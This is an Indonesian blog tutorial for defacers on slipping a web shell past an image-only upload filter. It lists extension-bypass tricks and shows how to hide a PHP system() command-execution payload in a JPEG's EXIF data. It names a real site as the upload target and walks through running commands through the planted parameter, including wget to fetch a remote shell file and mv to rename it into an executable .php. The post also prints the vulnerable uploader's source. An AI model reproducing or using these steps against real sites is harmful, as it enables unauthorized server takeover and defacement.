Thursday, May 11, 2017

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh

2 comment
Cara Upload Shell - Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh  - Dari sekian banyak tutorial yang ane temukan tentang bypass upload shell mulai dari extensi , tamper , sampe tusbol dalam haha.. eits tunggu  dulu ente kesini pasti pernah ngerasain kan ada web yang sulit untuk di bypass ?

kwkwkwk Slow gan sama aja ane juga dulu muter2 mikirin gimana agar shell ane bisa nyangkut di site itu :D khususnya untuk para defacer  :D oh iya lupa sedikit mengingatkan Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh  tidak rumit juga untuk proses exploitasinya hanya membutuhkan beberapa wejangan aja :D ok Lanjut simak ya

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh  ada juga lho tutorial videonya untuk yang kurang jelas dalam proses step by step di tutorial blog Gnoobz ini haha dan perlu di ingat juga ini  tutorial di buat karena sedang galau dan gk ada gairah gara2 ke inget mantan haha curhat dikit gpp kan :(.

Bahan Bahan yang di Perlukan
- Exif PILOT ( download di google banyak gan )
- Exif TOOL ( WINDOWS / LINUX ) 
- Shell
- Tamper data / burpsuite :D suka hati mu lah ;)

Sedikit Pengenalan tentang EXIF PILOT dalam Tutorial Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh Menurut Pendapat dan pandangan galauers ini :( sebuah Tools yang bisa dan mampu di gunakan untuk menyisipkan suatu kata / script :v kwkw maklum orang awan penjelasannya agak ngawur , tapi khususnya untuk para editor photo :D menambahkan hasil karya/nama dia dalam photo tersebut dengan tools ini.

http://ultramaryna.pl/pzp/Chall/

Disini salah satu uploader yang memfilter ekstensi tertentu khususnya hanya .jpg .png .gif aja

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh
Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh

seperti kita lihat pada gambar di atas setelah ane upload beberapa ekstensi shell dan segala macem bypassnya


contoh : .phtml .php jpg .php.txt .php;_.fla .pjpeg .cin .shtml .pjpg.php.jpg

dari beberapa ekstensi bypass di atas tidak ada yang mampu menembus kalbu si uploader di karenakan terdeteksi/tercium bau nya si shell tersebut maka dari itu kita perlu sisipkan shell ke dalam gambar.




ok pastikan sudah di install Exif Pilot Kalian

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh
- cari gambar yang mau di sisipkan shell
- buka exif pilot
- klik 2 kali pada gambar masukan source ( <?php system($_GET['SukaHatimu']);?> )
- klik ok

untuk lebih jelasnya lihat gambar di atas

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh
jika berhasil seperti gambar di atas shell sudah tersisipkan di dalam gambar
open with notepad untuk memastikan
jika sudah coba upload shell mu

tara upload berhasil di site atas tadi :D

Cara Upload Shell Dengan Gambar Mampu Mengelabui Uploader Dari Website Dengan Jitu 100% ampuh

nah gimana dong kalau udah ke upload itu kan masih berbentuk gambar untuk eksekusi shellnya gimana ?
ok cekidot liat dan perhatikan code dari <?php system($_GET['gayhodus');?>
bisa di sebut gayhodus menjadi paramater dari hasil upload di atas untuk proses nya

.php?gayhodus=uname < uname untuk check servernya apa
selanjutnya untuk upload shell
.php?gayhodus=wget link.com/shell.txt
.php?gayhodus=mv shell.txt ea.php

open dah di ea.php :D shell mu uploadeedddddddd
wget memanggil dari linkyang di panggill lah haha

berhubung di link itu ada yang hapus :D ya udah ane share segini aja dulu thanks for coming here

oke ada sedikit koreksi dari teman di group kalau tutorialnya kurang penjelasan
sebelumnya biar gak salah paham ane kasih source code dari uploader nya

<form method="post" enctype="multipart/form-data">
   <input type="file" name="file">
   <input type="submit" value="Upload" name="submit">
   </form>
  
   <?php
   if(isset($_POST['submit'])) {
       $name = $_FILES['file']['name'];
       $tmp  = $_FILES['file']['tmp_name'];
     
       $allowed = array('jpg','png','gif','jpeg');
     
       $exts = explode('.', $name);
     
       if(!in_array($exts[1], $allowed)) {
           echo 'Cuma Jpeg Doang Cok';
       } else {
           $info = getimagesize($tmp);
         
           if(!empty($info)) {
               if(move_uploaded_file($tmp, $name)) {
                   echo 'Ke Upload ==>>' .$name;
               } else {
                   echo 'Upload Gagal Total';
               }
           } else {
               echo 'Gambar Yang  Salah';
           }
       }
   }

 dari source diatas bisa di pastikan filternya hanya mampu membaca format jpg png gif
disitu ada 3 pilihan jika proses upload berhasil makanya muncul ( KE UPLOAD )
jika upload gagal / bukan extensi yang di butuhkan akan muncul ( Upload Gagal Total/Cuma Jpeg Doank COK )
jika upload berhasil nama muncul ( Gambar yang salah ) itu berhasil bypass extensinya .jpg.php namun gambar salah karena dalam gambar tersebut masih terdeteksi sebuah shell

untuk lebih jelasnya lihat kembali ke youtube/ videonya


https://www.youtube.com/watch?v=aqi1FW2M_Co

tonton videonya dimari untuk lebih jelasnya :D hahaa

NB : Tidak Semua Website Bisa Dengan Tutorial Ini :P
You Might Also Like

2 comments:

Whatsapp Button works on Mobile Device only

Start typing and press Enter to search